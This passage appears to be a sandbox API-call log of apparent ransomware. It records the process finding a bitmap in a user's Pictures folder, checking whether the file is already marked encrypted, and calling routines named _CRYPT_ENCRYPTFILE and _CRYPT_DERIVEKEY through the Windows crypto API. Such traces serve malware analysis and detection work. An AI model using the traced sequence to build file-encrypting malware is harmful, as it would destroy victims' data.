wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.790] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.790] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.790] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.790] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.790] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x499c4a70, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0x7c20c0 [0040.791] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x499c4a70, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0x7c20c0 [0040.791] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.791] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jmlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mlqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qzsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zsHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sHsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HsNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NYwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YwroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wroWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="roWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oWx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wx4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C3m9.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.793] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.793] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.793] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.793] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.793] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.793] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.793] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x499c4a70, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0x7c2100 [0040.794] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.794] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.794] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.794] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.794] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.794] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.794] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.795] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.795] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.795] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.796] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.796] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.796] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.796] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.796] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.796] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.796] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.796] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.797] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.797] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, 